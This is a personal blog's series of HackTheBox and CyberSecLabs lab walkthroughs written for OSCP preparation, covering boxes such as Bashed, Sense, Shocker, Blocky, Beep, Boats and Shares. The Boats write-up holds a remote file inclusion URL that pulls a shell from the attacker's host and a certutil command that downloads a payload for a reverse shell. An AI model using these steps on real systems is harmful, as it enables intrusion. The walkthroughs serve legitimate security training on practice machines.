Actual Tom

Writeup – HTB – Bashed

November 14, 2020November 14, 2020Tom MarslandLeave a comment

Now this was a fun change from the last one, and marks box #6 in my OSCP Prep. I had done this box some months ago and it was fun to play with again and re-remember how to do it.

Here’s the nmap scan:

Sweet! Only one port! Should be easy, right?

Browsing, we get a blog, and it mentions a php bash shell that arrexel developed on this very server! That has to be promising!

Kicking off a dirsearch, we indeed find some interesting directories.

And now we have a shell.

We quickly see that we can run commands as the user ‘scriptmanager’ with no password, and we can browse around. www-user is enough to get us into arrexel’s directory and find the user flag.

But how to get the pesky root flag? Well, let’s see what the scriptmanager user can do.

Of particular interest is this scripts folder in the root of the server. Looking inside the directory we find a test.py and a test.txt. Don’t forget to look in the directory as scriptmanager otherwise you won’t be able to see anything.

All the test.py script does it write to test.txt. But as you can see above, it must be doing it with root permissions as test.txt is only writable by root. It’s trivial to modify the python script to get the contents of root.txt and write them out for us.

Now just wait for the script to be run (cron job) and poof, you’ve got your root flag!

This was a fun box. I look forward to moving on to more! Video to follow shortly!

Uncategorized

Writeup – HTB – Sense

November 14, 2020November 14, 2020Tom MarslandLeave a comment

Okay, going to be up front with you guys – this box pissed me off. Enumeration of files on directories is key here, and apparently it’s dependent also on which tool you use. This had me running in circles all day today, but I got through it, and I want to share with you my success.

First, let’s get that nmap off.

Only thing here is 80/443, and when we go to anything on port 80, we are redirected to 443, with a lovely pfsense login.

I tried default credentials, which didn’t work, so I looked at gobuster for help.

gobuster found a changelog.txt, but did not find the file in question – probably because of the wordlist used. In this particular VM, you had to use the dirbuster wordlist, directory-list-lowercase-2.3-medium.txt, otherwise you weren’t finding the crucial other file you need.

I eventually found it, but only after I cheated and used dirsearch (which didn’t find it) and dirbuster (which did). This is the part that irritated me the most. After this, the box was trivial.

Once you know the username of ‘rohit’, you can login to the pfsense controller with rohit:pfsense (the default password for pfsense). This gives you the version of 2.1.3.

Searching Exploit DB for pfsense 2.1.3 shows us this link: https://www.exploit-db.com/exploits/43560

Downloading the python file, starting a netcat listener and running the python file works well.

And, as expected, the user.txt is in rohit’s user home folder, and the root.txt is in the root directory.

So, as I said, this box drove me crazy because of directory enumeration. To this day I still don’t know why my dirsearch didn’t work, and I think I need to modify my autorecon to run with the correct directory list so it finds more things. Either that, or this one is just an odd HackTheBox-ism.

Thanks for checking it out!

Cybersecurity / HackTheBox / OSCP / Walkthroughs

Writeup – HTB – Shocker

November 13, 2020Tom MarslandLeave a comment

As the name would suggest, I learned about a vulnerability called ShellShocker doing this one. First things first, kick off an auto-recon and let’s take a look at the full nmap scan.

Only port 80 and an SSH server running on a non-standard port. Let’s get after port 80.

Browsing to the page we don’t see anything exciting in the source, no robots, nothing there. So let’s see what else we can find with dirsearch. If you don’t have dirsearch, definitely get it. It’s a threaded version of dirb, dirbuster, gobuster, and it runs great.

Looking at this output, we have a couple directories. Maybe the cgi-bin has some scripts, so let’s run dirsearch again with some other extensions like .sh.

We found a .sh script inside of the cgi-bin on this server. Read more about this vulnerability here: https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29 , but then let’s get msfconsole up and running. Once you type ‘search shellshock’, you’ll want to use apache_mod_cgi_bash_env_exec , as that’s what we’re doing here.

Make sure to adjust your settings. Set your LHOST to your own IP address, and change the TARGETURI to the /cgi-bin/user.sh script we located. Additionally, set the RHOSTS to the ip address of the shocker VM in HackTheBox. Then try an exploit!

If all goes according to plan, we get a nice meterpreter session, like below:

Once here, drop into a shell with the ‘shell’ command, and poke around to find that user flag. Additionally, drop a sudo -l to see what our permissions are.

A few things from that picture above. You see how we don’t have a prompt? That doesn’t affect us on this box, but it will on future vms. Also, we see in shelly’s home directory the user flag, which is easy to submit at this point. Finally, we see that shell can run /usr/bin/perl with no password. Browse out to GTFOBins, at https://gtfobins.github.io/gtfobins/perl/ , and look at the sudo section.

And that makes short work of Shocker! As always, I’ll record a video walkthrough of this as well. Please consider subscribing to me on YouTube, and thanks for catching this walkthrough!

Cybersecurity / HackTheBox / OSCP / Walkthroughs

Writeup – HTB – Mirai

November 13, 2020November 13, 2020Tom MarslandLeave a comment

After adding this to my hosts file, I kicked off my autorecon and let it rip while I grabbed a drink. As the full nmap scan finished, we see Ports 22, 53, 80, 1615, 32400, and 32469 open.

OpenSSH 6.7p1 is a pretty new version, so no real exploits there. The next step in enumeration is to start looking up the versions of the software on each port and see what we can find.

There’s a series of exploits available for dnsmasq 2.76, but none look like they’ll allow for Remote Code Execution, so on we go!

Browsing to port 80 on the web server we find that we are blocked by Pi-Hole. Pi-Hole is a dns blocker that runs on Raspberry Pis.

Doing a search for Raspberry Pi default credentials lets us find credentials of pi:raspberry. This works for ssh!

It’s always great when you see (ALL : ALL) ALL, and (ALL) NOPASSWD: ALL. Quickly do a ‘sudo su’, and we’re root. Now to find some flags!

One down, looking for the root flag though proves a little trickier!

After some googling showing how to mount a USB stick into Linux, I checked the /media folder. Inside was a usbstick folder! Could it be too good to be true?

Yes – yes, it could be too good to be true.

However, if you go to /dev, and cat sdb, which is the second mounted device, you can filter through the wreckage and find the flag!

That’s all she wrote for this one! A bit trickier than my last boxes, but great teaching box! Thanks to HackTheBox!

Cybersecurity / HackTheBox / OSCP / Walkthroughs

Writeup – HTB – Blocky

November 13, 2020November 13, 2020Tom MarslandLeave a comment

Back to the hacking I go. Between the Masters program and three children all being home-schooled, it’s been a challenge for sure, but I’m back at it and happy to be doing it! This is a fun challenge to do as I work through the Linux boxes over at HackTheBox.

First, we run Autorecon, and we find a few ports, 21, 22, and 80, all open. We also see what’s supposedly a minecraft server on a high port. Looking at the versioning for ports 21 and 22 we don’t see much. There is a File Copy exploit for vsFTPd 1.3.5, but it doesn’t suit us here as there’s nothing on the FTP server. So on to port 80!

Once AutoRecon finished with Gobuster, I popped open those results, and looked for anything out of place. There’s a few pages to look at here.

Of particular curiosity is the /phpmyadmin and the /plugins. Browsing to the plugins directory you’ll find some downloadable Java repository files, or .JAR files. Let’s get into those.

Extracting “BlockyCore.jar” leads you to find the file “BlockyCore.class”, in /com/myfirstplugin folder. Looking up how to open a .CLASS file led me to install jd-gui, and open the file with that. In doing so, you’ll find some awesome credentials to a SQL server database!

Remember what we learned from Beep? Users hate unique passwords.

However, trying to ssh into this machine with root / 8YsqfCTnvxAUeduzjNSXe22 doesn’t work. There must be more. Thinking about accessing SQL servers, there’s a web interface with phpmyadmin. Let’s check that out!

Sure enough, we can login with those credentials to phpmyadmin.

So looking around here, we see a wordpress database, with a hash of a password. We also see a username, notch, both in the wp_users table.

Maybe notch is a good username for the machine? Sure enough, using the same password we logged into phpmyadmin with and the user ‘notch’ gets us shell access!

First thing I always do is try running ‘sudo -l’, and in this case, we get some great news!

Just run a quick ‘sudo su’ and you are now root!

Thanks to everyone for checking out my blog. Please also check out my video walkthroughs, and remember, users like to re-use passwords!

HackTheBox / Walkthroughs

Writeup – HTB – Beep

September 23, 2020September 23, 2020Tom MarslandLeave a comment

This box got me going for a little bit, until I remembered my basics and focused. Beep is a good box for demonstrating the most common vulnerability of all – users. With that said, let’s get to it! The initial AutoRecon scan shows a lot of open ports.

As you can see, we have a lot to work with here. SSH, SMTP, HTTP (on Port 80, 443, and 10000), a POP3 Server, an IMAP Server, and numerous others (HylaFax anyone?).

With there not being a lot of common ports here, probably the best place to start is by looking at the HTTP ports. Port 80 has nothing, and quickly redirects over to Port 443. Port 10000 has a Webmin portal up, which may be accessible.

The best thing here is to slow down, get all of your services down, and RESEARCH! Look up vulnerabilties on each port related to the services, and if possible, the versions of the software (if you can find them). This is the only good way to stop you from going down rabbit holes.

Eventually, on the HTTPS server on port 443, you’ll see the Elastix login. Looking up vulnerabilities for this takes you to https://www.exploit-db.com/exploits/37637, which describes the ability to perform some local file inclusion. If you read through the comments, you can find the Proof of Concept here:

Trying this out by pasting it in our browser window works! You’ll be able to pull up a configuration file for the Asterisk Management Portal. Right-clicking and selecting View-Source will probably make it look a little better for you, like this:

Scrolling through here we can see a bunch of passwords, including some that are re-used. That is the key to this lesson – password re-use. Maybe one of these is re-used for other logins. We have some passwords, let’s use the LFI vulnerability to get our users list.

Modifying the LFI to browse to the /etc/passwd file works, and we can see the standard root user has logon, as well as the user on the bottom, fanis.

Trying both of these user names against our passwords from our configuration file over SSH quickly gains us access. I’ve included a screenshot of an error I’ve received trying to SSH in here as well as the fix, for future reference. This is because of the age of this box, but it still could be applicable in future pentesting.

Once here, it’s a trivial matter again to browse to the two flags. No extra privilege escalation needed!

HackTheBox

Writeup – HTB – Lame

September 23, 2020September 23, 2020Tom MarslandLeave a comment

Lame is the first box from HackTheBox in my OSCP Preparation series, and I wanted to get off to a good foot with my methodology. Once we added the ip address to our /etc/hosts file as lame.htb, we kick off an AutoRecon scan and let it run. Opening the full nmap scan, we

As you can see, we have a few ports open, and nmap did a pretty good job here of giving us version information. After adding all of this to my notes, I began by looking up various exploits I could find for the different ports and services that were running. Ports 139 and 445, running SMB, looked the most juicy here, and in any penetration test, are the first I would typically go after.

Googling for ‘smb 3.0.20 exploit’ takes you to https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script, which is a link to a vulnerabilty on Rapid7’s website. Rapid7 is the creator of Metasploit, and they’ve got a module made just for this vulnerability.

Once you load metasploit, follow the directions on the Rapid7 site link above, and you’ll find yourself as the root user pretty quickly!

Root! This one was easy with no privesc required!

Of course, it’s not required in this instance, but the best thing to do here is to get a full shell (full TTY), as shown below.

I hope you enjoyed this walkthrough, and there will be many more to come! OSCP by Thanksgiving is my goal!

HackTheBox / Walkthroughs

OSCP Preps – Introduction

September 22, 2020September 22, 2020Tom MarslandLeave a comment

For my OSCP Preparations using HackTheBox, I’ll be following an awesome list made by TJ Null and the Mayor, Joe Helle. The list is curated here for your enjoyment. I did make a few changes – I sorted it out into Linux and Windows, and sorted from easiest to most difficult.

The purpose of doing this is to build up muscle memory in methodology, as well as get some great notes for taking the OSCP with.

Linux Boxes:

Lame
Beep
Blocky
Mirai
Shocker
Sense
Bashed
Nibbles
Valentine
Sunday
Frolic
Irked
Friendzone
Swagshop
Networked
Postman
Traverxec
OpenAdmin
Popcorn
Cronos
Haircut
Nineveh
SolidState
Node
Poison
TartarSauce
Jarvis
Brainfuck

Windows Boxes:

Legacy
Devel
Optimum
Arctic
Grandpa
Granny
Blue
Bounty
Jerry
Active
Bastion
Forest
Servmon
Buff (ACTIVE)
Bastard
Chatterbox
Silo
Secnotes
Conceal
BankRobber

For each box, I will write a walkthrough, and I will make a Youtube video of it as well. If it is during my stream time, I will livestream the work on it.

Thanks for coming along on the journey! I’m looking forward to this and crushing the OSCP before Christmas!

CyberSecLabs / Cybersecurity / Walkthroughs

Writeup – CSL – Boats

July 12, 2020July 12, 2020Tom MarslandLeave a comment

So the Boats box is a neat one, and I thoroughly enjoyed my first attempt at it live on Twitch the other day. Let’s dive right in and get after this!

Once we add the ip address to our /etc/hosts file, let’s get after this box with a good ol’ AutoRecon scan and check out the results. We see a bunch of ports open, including port 80, so while the scan is running, we can go check there.

Now, anytime I see a WordPress site, I get excited. And any time I see a potential plugin, I get even more excited. See that shopping cart label in the top right? That’s where I get excited.

So I kicked off a wpscan, and didn’t find anything, but I know there’s a plugin, so I clicked on the shopping cart and viewed the source. I see a plugin called “The Cart Press.” Let’s find vulnerabilities.

Over on Exploit Database, we see a few. The Remote File Inclusion one really piques my interest. Remote file inclusion will require us to host our own file to be called out by the vulnerability. Let’s hope we are on the right version and give it a shot!

Next step is to download one of my favorite remote shells and host it on a simple HTTP Server. I use the shell from https://github.com/namansahore/Remote-File-Inclusion-Shell. I highly recommend it (P.S., it’s forked on my repository as well!). Host that in the directory of your choice (I named mine shell.php) and fire up a simpleHTTPServer (I used sudo and did it on port 80).

http://172.31.1.14/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=http://10.10.0.11/shell.php

Boom, that was where I browsed to from Exploit-DB, and below is what you get when you pop my favorite remote file!

At this point the remote shell won’t work, but you can issue windows commands like dir to verify you have control. A great command to use in this case is certutil, and you can upload files utilizing it.

First step, make a payload using msfvenom. I utilize the cheatsheet over at https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/ to make my payloads.

Second, ensure your new shell.exe file is being hosted by your SimpleHTTPServer, and upload it with certutil. Here is the command line that worked for me: certutil -f http://10.10.0.11/shell.exe shell.exe

At this point, use msfconsole to kick off a meterpreter listener, as shown below, and run that shell.exe command! It’s going to be slow to connect, but once it does, you will be nt authority/system and be able to go get your flags!

Here’s our listener, and below kicks off the shell.exe!

Thanks for catching the next writeup in my OSCP Prep series of writeups for CyberSecLabs! Stay tuned for the YouTube video to follow! And as always, keep hacking!

CyberSecLabs / Cybersecurity / Walkthroughs

Writeup – CSL – Shares

July 9, 2020July 9, 2020Tom MarslandLeave a comment

As the first box I’m doing from the great guys over at CyberSecLabs (https://www.cyberseclabs.co.uk/), let’s fire it up and get to work!

After adding the alias shares.csl to my /etc/hosts file, I kicked off AutoRecon and took a close look at the results. Here we see port 21 (FTP), port 80 (HTTP), port 111 (RPC), port 2049 (NFS), and port 27853 (Running SSH!), as well as some higher level ports. This high SSH port seemed odd to me.

Looking into the easy ports here, with NFS (Network File Sharing), we take a look at the nmap scan that was run on Port 111, and we see the following mount:

The *.*.*.* means it can be mounted by any IP address.

We mount this drive and see what we’ve got:

How to mount the directory. There’s more!

Thinking back to the high-port number running SSH, I bet that .ssh directory may be interesting!

Unfortunately, when you try using the private SSH key to login, and if you paid attention above, you’ll be denied access, asking for a passphrase, as the key is …. ENCRYPTED! But have no fear, ssh2john is here!

Once you have it prepped for john, run john with the rockyou.txt wordlist to find the passphrase for the original key!

Now that we have the passphrase, don’t forget to chmod 600 the original private key and let’s login. Once logged in, run sudo -l, and we see there’s a user named amy that we can run /usr/bin/pkexec or /usr/bin/python3 as.

It’s trivial at this point to get on as amy. Simply search GTFOBins for the python binary, and take a look at sudo privileges, https://gtfobins.github.io/gtfobins/python/. Switching users to amy and running python is a breeze.

Now, as amy, don’t forget to get the access.txt flag, and let’s sudo -l again! Now you see that we can run /usr/bin/ssh as anyone we want with no password, including root!

A quick trip back to GTFOBins shows us the way. Just look under sudo for ssh: https://gtfobins.github.io/gtfobins/ssh/

Thanks for tuning in to the first box I’ve gone after in the Beginner section of CyberSecLabs! I’m truly enjoying the quality of the content they’re providing here so far, and stay tuned for more!